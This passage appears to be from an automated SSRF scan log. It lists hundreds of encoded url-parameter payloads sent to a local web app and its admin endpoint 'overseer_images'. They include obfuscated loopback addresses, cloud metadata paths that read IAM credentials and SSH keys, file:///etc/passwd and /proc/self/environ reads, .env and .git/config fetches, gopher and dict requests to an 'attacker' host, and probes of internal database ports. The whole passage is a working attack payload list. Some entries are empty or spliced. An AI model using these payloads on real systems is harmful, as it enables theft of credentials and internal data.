`http://localhost:4200/?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/?url=127.0.1.3` +- Testing: `http://localhost:4200/?url=0` +- Testing: `http://localhost:4200/?url=127.1` +- Testing: `http://localhost:4200/?url=127.0.1` +- Testing: `http://localhost:4200/?url=localhost` +- Testing: `http://localhost:4200/?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/?url=0177.0.0.01` +- Testing: `http://localhost:4200/?url=7F000001` +- Testing: `http://localhost:4200/?url=2130706433` +- Testing: `http://localhost:4200/?url=6425673729` +- Testing: `http://localhost:4200/?url=127001` +- Testing: `http://localhost:4200/?url=127_0._0_1` +- Testing: `http://localhost:4200/?url=0000%3A%3A1` +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/?url=localtest.me` +- Testing: `http://localhost:4200/?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/?url=127.127.127.127` +- Testing: `http://localhost:4200/?url=0177.0.0.1` +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/?url=0x7f000001` +- Testing: `http://localhost:4200/?url=017700000001` +- Testing: `http://localhost:4200/?url=0177.00.00.01` +- Testing: `http://localhost:4200/?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/?url=169.254.169.254` +- Testing: `http://localhost:4200/?url=2852039166` +- Testing: `http://localhost:4200/?url=7147006462` +- Testing: `http://localhost:4200/?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/?url=0xa9fea9fe` +- Testing: `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/?url=127.0.0.0` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/?url=127.1.1.1` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/?url=3232235521` +- Testing: `http://localhost:4200/?url=3232235777` +- Testing: `http://localhost:4200/?url=425.510.425.510` +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/?url=instance-data` +- Testing: `http://localhost:4200/?url=localhost%3A22` +- Testing: `http://localhost:4200/?url=localhost%3A443` +- Testing: `http://localhost:4200/?url=localhost%3A80` +- Testing: `http://localhost:4200/?url=localhost%3A3389` +- Testing: `http://localhost:4200/?url=localhost%3A8000` +- Testing: `http://localhost:4200/?url=localhost%3A8001` +- Testing: `http://localhost:4200/?url=localhost%3A8444` +- Testing: `http://localhost:4200/?url=localhost%3A9901` +- Testing: `http://localhost:4200/?url=localhost.localdomain` +- Testing: `http://localhost:4200/?url=loopback` +- Testing: `http://localhost:4200/?url=loopback%3A22` +- Testing: `http://localhost:4200/?url=loopback%3A80` +- Testing: `http://localhost:4200/?url=loopback%3A443` +- Testing: `http://localhost:4200/?url=loopback%3A3389` +- Testing: `http://localhost:4200/?url=loopback%3A8000` +- Testing: `http://localhost:4200/?url=loopback%3A9901` +- Testing: `http://localhost:4200/?url=loopback%3A8001` +- Testing: `http://localhost:4200/?url=loopback%3A8444` +- Testing: `http://localhost:4200/?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/?url=metadata.nicob.net` +- Testing: `http://localhost:4200/?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/?url=127.1%3A80` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/?url=2130706433%2F` +- Testing: `http://localhost:4200/?url=3232235521%2F` +- Testing: `http://localhost:4200/?url=3232235777%2F` +- Testing: `http://localhost:4200/?url=0x7f000001%2F` +- Testing: `http://localhost:4200/?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/?url=0%2F` +- Testing: `http://localhost:4200/?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/admin/overseer_images +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.127.127.127` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.1.3` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.0` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2130706433` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=017700000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com.localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localtest.me` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2130706433%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235521%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235777%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localtest.me` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: 